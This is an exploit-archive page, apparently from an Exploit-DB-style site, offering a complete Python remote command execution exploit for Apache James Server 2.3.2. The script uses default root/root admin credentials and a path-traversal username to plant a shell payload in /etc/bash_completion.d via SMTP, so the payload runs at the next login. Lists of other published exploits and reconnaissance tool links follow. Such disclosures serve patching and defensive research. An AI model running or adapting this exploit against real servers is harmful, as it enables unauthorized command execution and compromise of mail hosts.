"Apache James Server 2.3.2 - Remote Command Execution"

Author

Exploit author

"Jakub Palaczynski"

Platform

Exploit platform

linux

Release date

Exploit published date

2014-12-10

                
                    
                         Download file
                    
                
            
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]

def recv(s):
        s.recv(1024)
        time.sleep(0.2)

try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()

    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo team@team.pl\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: team@team.pl\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
except:
    print "Connection failed."

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-11-27	"libupnp 1.6.18 - Stack-based buffer overflow (DoS)"	dos	linux	"Patrik Lantz"
2020-11-24	"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)"	webapps	linux	"Giuseppe Fuggiano"
2020-10-28	"PackageKit < 1.1.13 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"aptdaemon < 1.1.1 - File Existence Disclosure"	local	linux	"Vaisha Bernard"
2020-10-28	"Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion"	webapps	linux	"Ivo Palazzolo"
2020-10-28	"Blueman < 2.1.4 - Local Privilege Escalation"	local	linux	"Vaisha Bernard"
2020-09-11	"Gnome Fonts Viewer 3.34.0 - Heap Corruption"	local	linux	"Cody Winkler"
2020-07-10	"Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution"	remote	linux	SpicyItalian
2020-07-06	"Grafana 7.0.1 - Denial of Service (PoC)"	dos	linux	mostwanted002

Release Date	Title	Type	Platform	Author
2020-07-06	"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"	webapps	multiple	"Jakub Palaczynski"
2019-10-07	"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation"	local	windows	"Jakub Palaczynski"
2019-10-07	"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload"	webapps	java	"Jakub Palaczynski"
2019-05-21	"Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution"	webapps	java	"Jakub Palaczynski"
2018-11-05	"Royal TS/X - Information Disclosure"	webapps	json	"Jakub Palaczynski"
2018-10-31	"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution"	webapps	php	"Jakub Palaczynski"
2018-09-17	"CA Release Automation NiMi 6.5 - Remote Command Execution"	remote	java	"Jakub Palaczynski"
2017-12-13	"Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read"	webapps	cgi	"Jakub Palaczynski"
2017-09-13	"Astaro Security Gateway 7 - Remote Code Execution"	remote	hardware	"Jakub Palaczynski"
2016-10-20	"Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection"	webapps	xml	"Jakub Palaczynski"
2015-06-10	"HP WebInspect 10.4 - XML External Entity Injection"	webapps	xml	"Jakub Palaczynski"
2014-12-12	"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution"	webapps	jsp	"Jakub Palaczynski"
2014-12-10	"Apache James Server 2.3.2 - Remote Command Execution"	remote	linux	"Jakub Palaczynski"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Apache James Server 2.3.2 - Remote Command Execution"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.